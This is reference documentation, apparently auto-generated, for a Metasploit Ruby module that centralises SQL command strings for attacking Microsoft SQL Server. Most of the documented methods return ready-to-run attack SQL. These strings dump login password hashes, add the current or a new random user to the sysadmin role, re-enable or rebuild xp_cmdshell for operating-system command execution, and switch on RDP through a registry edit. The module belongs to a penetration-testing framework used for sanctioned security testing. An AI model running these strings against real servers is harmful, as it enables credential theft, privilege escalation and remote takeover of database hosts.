Module: Msf::Exploit::Remote::MSSQL_COMMANDS
- Included in:
- MSSQL, Post::Windows::MSSQL
- Defined in:
- lib/msf/core/exploit/remote/mssql_commands.rb
Overview
This module provides MSSQL specific commands in a centralized manner.
Instance Method Summary collapse
- #mssql_2k5_password_hashes(opts = {}) ⇒ Object
- #mssql_2k_password_hashes(opts = {}) ⇒ Object
-
#mssql_current_user_escalation(opts = {}) ⇒ Object
Add SQL current user to sysadmin group.
- #mssql_db_names(opts = {}) ⇒ Object
-
#mssql_enumerate_servername(opts = {}) ⇒ Object
Grab servername.
- #mssql_is_sysadmin(opts = {}) ⇒ Object
-
#mssql_rdp_enable(opts = {}) ⇒ Object
Turn on RDP.
-
#mssql_rebuild_xpcmdshell(opts = {}) ⇒ Object
Rebuild xp_cmdshell if it was deleted.
-
#mssql_sa_escalation(opts = {}) ⇒ Object
Add random user and random password to “sa” role on MSSQL.
-
#mssql_sql_info(opts = {}) ⇒ Object
Get SQL Server Version Info.
-
#mssql_sql_xpcmdshell_disable_2000(opts = {}) ⇒ Object
Disable the xp_cmdshell stored procedure in 2000.
-
#mssql_xpcmdshell_disable(opts = {}) ⇒ Object
Disable the xp_cmdshell stored procedure on 2005 and 2008.
-
#mssql_xpcmdshell_enable(opts = {}) ⇒ Object
Re-enable the xp_cmdshell stored procedure in 2005 and 2008.
-
#mssql_xpcmdshell_enable_2000(opts = {}) ⇒ Object
Re-enable the xp_cmdshell stored procedure on 2000.
Instance Method Details
#mssql_2k5_password_hashes(opts = {}) ⇒ Object
64 65 66 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 64 def mssql_2k5_password_hashes(opts={}) "SELECT name, password_hash FROM master.sys.sql_logins" end |
#mssql_2k_password_hashes(opts = {}) ⇒ Object
68 69 70 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 68 def mssql_2k_password_hashes(opts={}) "SELECT name, password FROM master..sysxlogins" end |
#mssql_current_user_escalation(opts = {}) ⇒ Object
Add SQL current user to sysadmin group
60 61 62 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 60 def mssql_current_user_escalation(opts={}) "declare @moo varchar(50); set @moo = (select SYSTEM_USER); exec master..sp_addsrvrolemember @moo, 'sysadmin'" end |
#mssql_db_names(opts = {}) ⇒ Object
76 77 78 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 76 def mssql_db_names(opts={}) "SELECT name FROM master..sysdatabases" end |
#mssql_enumerate_servername(opts = {}) ⇒ Object
Grab servername
43 44 45 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 43 def mssql_enumerate_servername(opts={}) "SELECT @@SERVERNAME" end |
#mssql_is_sysadmin(opts = {}) ⇒ Object
72 73 74 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 72 def mssql_is_sysadmin(opts={}) "SELECT is_srvrolemember('sysadmin')" end |
#mssql_rdp_enable(opts = {}) ⇒ Object
Turn on RDP
38 39 40 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 38 def mssql_rdp_enable(opts={}) "exec master..xp_cmdshell 'REG ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /f /d 0';" end |
#mssql_rebuild_xpcmdshell(opts = {}) ⇒ Object
Rebuild xp_cmdshell if it was deleted
33 34 35 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 33 def mssql_rebuild_xpcmdshell(opts={}) "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;" end |
#mssql_sa_escalation(opts = {}) ⇒ Object
Add random user and random password to “sa” role on MSSQL
53 54 55 56 57 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 53 def mssql_sa_escalation(opts={}) var_username = opts[:username] || rand_text_alpha(5) var_password = opts[:password] || rand_text_alpha(10) "exec sp_addlogin '#{var_username}', '#{var_password}';exec sp_addsrvrolemember '#{var_username}', 'sysadmin'" end |
#mssql_sql_info(opts = {}) ⇒ Object
Get SQL Server Version Info
48 49 50 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 48 def mssql_sql_info(opts={}) "SELECT @@VERSION" end |
#mssql_sql_xpcmdshell_disable_2000(opts = {}) ⇒ Object
Disable the xp_cmdshell stored procedure in 2000
28 29 30 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 28 def mssql_sql_xpcmdshell_disable_2000(opts={}) "exec sp_dropextendedproc 'xp_cmdshell';" end |
#mssql_xpcmdshell_disable(opts = {}) ⇒ Object
Disable the xp_cmdshell stored procedure on 2005 and 2008
23 24 25 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 23 def mssql_xpcmdshell_disable(opts={}) "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;" end |
#mssql_xpcmdshell_enable(opts = {}) ⇒ Object
Re-enable the xp_cmdshell stored procedure in 2005 and 2008
13 14 15 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 13 def mssql_xpcmdshell_enable(opts={}) "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" end |
#mssql_xpcmdshell_enable_2000(opts = {}) ⇒ Object
Re-enable the xp_cmdshell stored procedure on 2000
18 19 20 |
# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 18 def mssql_xpcmdshell_enable_2000(opts={}) "exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';" end |